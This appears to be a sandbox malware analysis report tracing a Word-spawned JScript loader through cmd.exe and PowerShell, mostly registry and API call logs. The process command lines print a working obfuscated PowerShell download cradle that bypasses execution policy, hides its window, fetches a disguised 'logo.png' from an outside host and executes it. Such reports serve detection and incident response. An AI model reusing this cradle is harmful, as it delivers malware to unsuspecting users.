Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = PowerShell	1	Fn
Registry	Open Key	reg_name = Windows PowerShell	1	Fn
Registry	Open Key	reg_name = Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn

Thread 0x40c

34

0

»

Category	Operation	Information	Success	Count	Logfile

Process #28: wscript.exe

134

0

»

Information	Value
ID	#28
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:33, Reason: Child Process
Unmonitor	End Time: 00:01:40, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

»

Information	Value
PID	0xa34
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 358 0x 364 0x 110 0x 858 0x 77C 0x B84 0x 884 0x A04 0x B0C 0x 184

Threads

Thread 0x358

133

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:36 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 163957	1	Fn
System	Get Time	type = Performance Ctr, time = 21827101820	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff6b0000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:38 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 165907	1	Fn
System	Get Time	type = Performance Ctr, time = 22022684921	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:38 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 166499	1	Fn
System	Get Time	type = Performance Ctr, time = 22084418337	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	type = size	1	Fn
File	Read	size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:38 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 166499	1	Fn
System	Get Time	type = Performance Ctr, time = 22085446395	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 166905	1	Fn
System	Get Time	type = Ticks, time = 166921	5	Fn
System	Get Time	type = Ticks, time = 166936	12	Fn
System	Get Time	type = Ticks, time = 167061	5	Fn
System	Get Time	type = Ticks, time = 167077	6	Fn
System	Get Time	type = Ticks, time = 167092	4	Fn
System	Get Time	type = Ticks, time = 167217	3	Fn
System	Get Time	type = Ticks, time = 167233	3	Fn
System	Get Time	type = Ticks, time = 167248	1	Fn
System	Get Time	type = Ticks, time = 167326	1	Fn
System	Get Time	type = Ticks, time = 167357	3	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x110

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 4348512		1	Fn

Process #29: cmd.exe

57

0

»

Information	Value
ID	#29
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:34, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:51

OS Process Information

»

Information	Value
PID	0x828
Parent PID	0x154 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 610

Threads

Thread 0x610

57

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:38 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 166484	1	Fn
System	Get Time	type = Performance Ctr, time = 22082414949	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x310, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #30: powershell.exe

276

0

»

Information	Value
ID	#30
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:36, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:49

OS Process Information

»

Information	Value
PID	0x310
Parent PID	0x828 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 6BC 0x 8F8 0x 8BC 0x B00 0x B14 0x B08 0x D14

Threads

Thread 0x6bc

242

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
